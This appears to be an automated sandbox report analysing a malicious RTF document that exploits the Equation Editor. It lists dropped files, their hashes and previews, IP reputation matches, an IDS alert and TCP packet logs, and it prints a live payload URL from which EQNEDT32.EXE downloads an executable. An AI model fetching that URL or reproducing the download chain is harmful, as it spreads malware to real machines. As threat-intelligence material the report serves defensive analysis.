                                                                                                                                                            http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            NEW PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.141
                                                                                                                                                            p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.185.159.144
                                                                                                                                                            NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141
                                                                                                                                                            IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.177
                                                                                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 198.49.23.141

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            IE Cache URL:http://sea-shared-5.masterns.com/~vhlcnlog/ugopoundx/skypoundx.exe
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BFBB-6C9AC8D8FC42}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):15910
                                                                                                                                                            Entropy (8bit):3.6060056836164947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Lwr2OJ5BfZYoWdcLEH9+qkoN6HQKWfFoPNgsH0wgNOMkihDKK0SKGKVSR/rHa+:Lc20552/dcLEpkoN6kFolgsUwe8DAR/V
                                                                                                                                                            MD5:B7C7FDADBD941B2641EC39B77CE91005
                                                                                                                                                            SHA1:5DFAFC5DF67D6121306E2E86779856F5105492C4
                                                                                                                                                            SHA-256:7C7AFB0736B7523F61C112904F60ABC2A744BEE1BA82F9B65880AFC915BE0F07
                                                                                                                                                            SHA-512:216AD30F00C0638320EA6DBC72093D10135A0581ED4D1859EDD961D7A506A04418641ACA24AA09A18008FAA80710AC072623560C26FF42A6F32FC42758C37588
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ,.>.1.;.5.1.|.?...=.2.=.8.-.*.].?.8.3._.?.?.?...0.7.?.6.$._.~.#.,.`.|._.>.#.4.'...:.#.0...~.%.-.+.[./.?.`.-.].<.1.?.*.=.6.`.?.1.!.%._.9.%.%.~.?.,.%.?.:.'.:._._.3.&.%...].7.*.'...,.$.>...7...,.9.:.%.:.[.;...>.+.~.0.'.9.8.|.=.[.%...?.$...&...!.-.].3.'.@._.0.&.0.[.:.?.&.^.7.|.^.1.,.?.*.+...2.`.?.]...[.,.?.$.?.~.|._.#.?.].|.8.^.9.?.^.'.(.&.?.?.8.%.7.&.@.7.7.(.`.?.....|.?...>.%.7.=.+...@.8.9.?._.?.2.7.4.?.).%.'.1.+.]._.4.[./.?._.6.5.?.|.#...~.,...$.4.>.@.].-.1.-.2.+.).!....._.?.?.?.0.'.4.-...-.#.0.+.?.1.2.|.?.9.&.+...].7.:.!...1.%.].(.).^.%.1.(.@.`.&.%.?...-.<.%.0.?.6.*.].'./.6.'.).`.<.?.0...(.%.5.[.?...(.+.8.=.%.+.!.=.).7.1.<.4._.?.*.;.#.2.5.#.%.(.&.?.2...).:.0.`...9...'.?.8.2.6.^.%.%...4.?.7.5.%...8.!.3.|.:.2.,.:.0.*...^.%.:.$.|.&.@.?.|.&.'...8.*.5...9...?._.<.,.,.6._.=.9.!.:.+.'._.-.#.+...?.?.7.6.%.#._.'.-.=.?.0.].*.9.<.'.=.:.>.1.%.;.9.5.^.`.8.|.|.'.0.`.1...*.>.].%.?.2.[..._.*.@.@.....9.].%.:.3.8._.!.@.?.?.).;.#.1.?.%.?.@.0.1.>.2.'.:.1...:.$.6.*.?.,.0.?.|.4.?.2.~...3...?.&.3...^.#.4.^.>.
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1024
                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\VOMAXTRADING.LNK
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Nov 26 15:43:37 2020, length=1677719, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2048
                                                                                                                                                            Entropy (8bit):4.592219282555606
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8o/XT0jFzg+nK1SQh2o/XT0jFzg+nK1SQ/:8o/XojFklSQh2o/XojFklSQ/
                                                                                                                                                            MD5:EA51793AD3A560670A797369376A17A4
                                                                                                                                                            SHA1:226070D83E347F57849A2FD702A174CBF4CA34BB
                                                                                                                                                            SHA-256:839D28CDFA52ECC4260EAD6810BDED8DC2A4EA86D8884D68D7F140EBF56DCC1D
                                                                                                                                                            SHA-512:2ED194A371C117671B65D0B91DC52D8A9A2A0860C75410539CCD46F12ECB343D431CFC32FFE539C66089D567DB1C62EB01329EF3AA858B20902990BB6745718F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F.... ...[.v..{..[.v..{..b..I.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....zQs. .VOMAXT~1.DOC..N.......Q.y.Q.y*...8.....................V.O.M.A.X.T.R.A.D.I.N.G...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\965543\Users.user\Desktop\VOMAXTRADING.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.V.O.M.A.X.T.R.A.D.I.N.G...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965543..........D_....3N...W...9F.C...........[D_....3N...W
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):74
                                                                                                                                                            Entropy (8bit):4.441787744171977
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:M1//hs23orLhs23omX1//hs23ov:MRC23gG23nC23y
                                                                                                                                                            MD5:71298FC792A38B7B149B2B8EF01DBF34
                                                                                                                                                            SHA1:E25BCF5F84E6F9AD6C5075AA5A86FEB6B589414A
                                                                                                                                                            SHA-256:CC4CA7D8FE6495FD05F930393742B164F7C624CB7DE500142D92A244D20BA362
                                                                                                                                                            SHA-512:20C2D0BB9EF31EA23BBA7178E74C5C683BBA42C529CB04F6D7AD0FD54F0D0AFEEEEA8B2FB7AECB12A961DB70C44CD471F762E1CDC85084D5DC0C1895337A6730
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: [doc]..VOMAXTRADING.LNK=0..VOMAXTRADING.LNK=0..[doc]..VOMAXTRADING.LNK=0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.431160061181642
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):278528
                                                                                                                                                            Entropy (8bit):7.931078843712846
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Y9Cf0RF9jxtXEtdKKoEml7J9Vz0IFlR/x9SMdGgoJ7tGG:0S0RDfXE3zDml7Zz1FT/x9SLtGG
                                                                                                                                                            MD5:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            SHA1:EBBE29AD9CBEEE24AE52A5A77F57D3C0ADD317D9
                                                                                                                                                            SHA-256:0757426A4B616E13F2EC816793E22CB933978A99BFC1A771537E68D74AD2D0D0
                                                                                                                                                            SHA-512:ED155470CE9FC32A16E2CFED9AC712F5C2EB8AD810BC6BF7C8916FFD3842D133A8B2DC8565C7373C92AF4FBED536C953A65B2019D387EB06DB9F1D5BFD504169
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.._.....................L........... ... ....@.. ....................................@.................................d...W.... ..8I........................................................................... ............... ..H............text........ ...................... ..`.rsrc...8I... ...J..................@..@.reloc...............>..............@..B........................H.......l...."......C....0...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............-.&(....+.&+.*....0.............,.&(....+.&+.*....0..
                                                                                                                                                            C:\Users\user\Desktop\~$MAXTRADING.doc
                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):162
                                                                                                                                                            Entropy (8bit):2.431160061181642
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Rich Text Format data, unknown version
                                                                                                                                                            Entropy (8bit):4.036944960469874
                                                                                                                                                            TrID:
                                                                                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                                                                                            File name:VOMAXTRADING.doc
                                                                                                                                                            File size:1677719
                                                                                                                                                            MD5:30244581b41accd77dab936571e0d87e
                                                                                                                                                            SHA1:46ddb3fa250dfb4808c3a43f7846d7c643a4f325
                                                                                                                                                            SHA256:2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
                                                                                                                                                            SHA512:485074c33256cd04b80f1f58297f5d26f55be56cd8837d35a825d8612407b310bfa29cde9e1934eec92da0a77b37f6e21f0ced9e3ce731ed8673c4b4da82f00e
                                                                                                                                                            SSDEEP:24576:8eqGjcemPSHjVfwQVPx830KDxaeb7uL4RUYspUNt9DzSae7TTyCACNy9r9JK3E3t:W
                                                                                                                                                            File Content Preview:{\rtf95781,>1;51|?.=2=8-*]?83_???.07?6$_~#,`|_>#4'.:#0.~%-+[/?`-]<1?*=6`?1!%_9%%~?,%?:':__3&%.]7*'.,$>.7.,9:%:[;.>+~0'98|=[%.?$.&.!-]3'@_0&0[:?&^7|^1,?*+.2`?].[,?$?~|_#?]|8^9?^'(&??8%7&@77(`?..|?.>%7=+.@89?_?274?)%'1+]_4[/?_65?|#.~,.$4>@]-1-2+)!.._???0'4-

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                            Static RTF Info

                                                                                                                                                            Objects

                                                                                                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                            000001CCBh2embeddedeQuATION.3834994no

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            11/26/20-08:46:10.744772TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 26, 2020 08:44:06.539177895 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.719369888 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.719521046 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.720232010 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.900260925 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900933027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900969982 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900993109 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901015997 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901037931 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901063919 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901091099 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901108980 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901110888 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901134968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901139021 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901144028 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901148081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901159048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901165962 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901185989 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901226044 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.908030987 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.117697954 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117738008 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117760897 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117782116 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117804050 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117820978 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117836952 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117851973 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117867947 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117887020 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117899895 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117912054 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117928028 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117944002 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117960930 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117961884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.117974043 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117985964 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117997885 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118005037 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118057013 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118916035 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118940115 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118998051 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.119949102 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298139095 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298182011 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298197985 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298209906 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298222065 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298238993 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298255920 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298273087 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298286915 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298305988 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298330069 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298347950 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298372984 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298393965 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298413992 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298434973 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298453093 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298501968 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298508883 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298511028 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298512936 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298515081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298518896 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298535109 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298542023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298552036 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298567057 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298583031 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298587084 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298599005 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298609972 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298624039 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298631907 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298643112 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298650026 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298674107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298676968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298691988 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298701048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298711061 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298719883 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298737049 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298739910 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298753023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298755884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298768997 CET8049167104.168.198.45192.168.2.22
